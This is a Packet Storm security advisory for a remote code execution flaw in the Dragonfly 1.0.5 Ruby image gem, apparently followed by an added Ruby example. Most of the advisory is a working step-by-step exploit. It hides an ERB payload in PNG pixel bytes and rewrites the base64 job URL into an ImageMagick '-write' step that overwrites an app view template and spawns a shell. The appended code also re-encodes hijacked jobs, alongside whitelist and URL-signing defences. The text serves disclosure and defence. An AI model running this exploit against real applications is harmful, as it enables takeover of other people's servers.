Dragonfly 1.0.5 Remote Code Execution

Date: 25 Aug 2014
Reported by: coco
Type: packetstorm
Source: packetstormsecurity.com

RCE vulnerability in the Dragonfly gem 1.0.5 allows arbitrary command execution through ImageMagick during image upload/processing.

Code
RCE in the Dragonfly gem for image uploading & processing in
rails/sinatra, in version 1.0.5. (https://github.com/markevans/dragonfly)

The underlying vulnerability is that you can pass arbitrary arguments to
ImageMagick's convert, thus granting arbitrary read/write access to the
filesystem. Additionally the -process flag seems to be able to load
custom modules, which might result in execution of arbitrary files.
  
Here is a description of _one_ way of how to abuse the RCE vulnerability:
$ cat exploit.rb
<%= puts "I got ownd" %>
<% require 'pry' %>
<% binding.pry %>
$ wc exploit.rb
3 13 63 exploit.rb
The byte length needs to be a multiple of 3 (21x3 = 63) because every
pixel of an 8-bit RGB image holds 3 bytes, one per channel; with a
geometry of 21x1 the file maps onto exactly 21 pixels.
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png
Test that everything went well by dumping the raw pixel bytes back out:
$ convert exploit.png test.rgb
diff should not show any differences:
$ diff test.rgb exploit.rb
Upload the picture and copy the image URL, e.g.:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0
Open pry or irb and decode the job the URL carries:
Base64.decode64 "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0"
=> "[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"thumb\",\"400x200#\"]]"
Now encode a job that keeps the fetch step but replaces the "thumb" step
with a raw convert step, which writes the (still verbatim) pixel bytes
into a template of the app:
Base64.strict_encode64 "[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"convert\",\"-write rgb:/path/to/rails/app/views/photos/index.html.erb\"]]"
=> "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0="
Go to your browser and request:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0=
and then: http://domain.tld/photos/
which renders app/views/photos/index.html.erb and spawns a pry on the
terminal you called rails server from.
Of course you can use ImageMagick flags other than -write to achieve the
same code execution, so this really calls for a whitelist that restricts
the arguments that can be sent to ImageMagick.
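An added example, not code from the advisory or from Dragonfly, covering both the URL manipulation above and the whitelist the author asks for. The two tokens are the ones quoted above; decode_job/encode_job reproduce the encoding they show (a JSON array of job steps, base64, "=" padding optional on the wire) and are this example's own, not Dragonfly's serializer. The processor whitelist patterns and the HMAC signing are illustrations of the two defences (restrict what can reach convert, sign the job URL so it cannot be rewritten), not Dragonfly's implementation of verify_urls.

```ruby
require "base64"
require "json"
require "openssl"

# Job tokens copied from the advisory: the benign thumb job and the rewritten one.
THUMB_URL   = "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0"
CONVERT_URL = "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0="

# Token -> array of steps. The advisory shows one token without "=" and one
# with it, so padding is restored before strict decoding.
def decode_job(token)
  token = token.strip
  token += "=" * ((4 - token.length % 4) % 4)
  JSON.parse(Base64.strict_decode64(token))
end

# Steps -> token, in the unpadded form the application emitted.
def encode_job(steps)
  Base64.strict_encode64(JSON.generate(steps)).delete("=")
end

# What the attacker does: keep the fetch ("f") step, swap the processor ("p")
# step for a raw convert argument string.
def hijack(token, convert_args)
  decode_job(token).map { |step| step[0] == "p" ? ["p", "convert", convert_args] : step }
end

# Whitelist: a processor must be known and its arguments must match a tight
# pattern. "convert" (free-form ImageMagick arguments) is deliberately absent.
# Names and patterns are this example's choice, not Dragonfly's.
ALLOWED_PROCESSORS = {
  "thumb"  => ->(a) { a.size == 1 && a[0].is_a?(String) && a[0].match?(/\A\d{1,4}x\d{1,4}[#>!<]?\z/) },
  "rotate" => ->(a) { a.size == 1 && a[0].is_a?(String) && a[0].match?(/\A-?\d{1,3}\z/) },
  "encode" => ->(a) { a.size == 1 && %w[jpg png gif].include?(a[0]) },
}.freeze

def job_allowed?(steps)
  steps.all? do |kind, name, *args|
    case kind
    when "f" then args.empty? && name.is_a?(String) && !name.include?("..") && !name.start_with?("/")
    when "p" then ALLOWED_PROCESSORS.key?(name) && ALLOWED_PROCESSORS[name].call(args)
    else false
    end
  end
end

# URL signing, the idea behind verify_urls: an HMAC over the token with a
# server-side secret, so a rewritten token no longer verifies. Generic HMAC
# illustration only, not Dragonfly's own sha scheme.
def sign(token, secret)
  OpenSSL::HMAC.hexdigest("SHA256", secret, token)
end

def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def verified?(token, sig, secret)
  secure_equal?(sig, sign(token, secret))
end

if __FILE__ == $PROGRAM_NAME
  steps = decode_job(THUMB_URL)
  evil  = hijack(THUMB_URL, "-write rgb:/path/to/rails/app/views/photos/index.html.erb")
  puts "decoded:   #{steps.inspect}"
  puts "hijacked:  #{encode_job(evil)}"
  puts "whitelist: thumb=#{job_allowed?(steps)} convert=#{job_allowed?(evil)}"
  sig = sign(THUMB_URL, "server-secret")
  puts "signature: original=#{verified?(THUMB_URL, sig, 'server-secret')} rewritten=#{verified?(CONVERT_URL, sig, 'server-secret')}"
end
```

The two checks are complementary: signing stops an outsider from rewriting a job, while the processor whitelist still matters for any code path that builds jobs from user input server-side, and for deployments that (as the advisory predicts) turn verification off.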
  
The author was contacted and committed "fixes" (dragonfly version 1.0.6,
https://github.com/markevans/dragonfly/commit/e88afeceb036fe4d44f7c7787c7e988e1350c2dc#diff-d41d8cd98f00b204e9800998ecf8427e).
The main fix seems to be renaming 'dos_prevention' to 'verify urls
(recommended)'. Needless to say, many websites out there will still
disable the verification for ease of deployment, e.g. for javascript that
requests thumbnail versions of images on the fly. Note that this
vulnerability is still exploitable even if the attacker is unable to
upload images, by using the generators to "draw" arbitrary images with
ImageMagick commands.
  
cheers,  
coco & leex  
http://hexgolems.com/fd/dragonfly.txt  
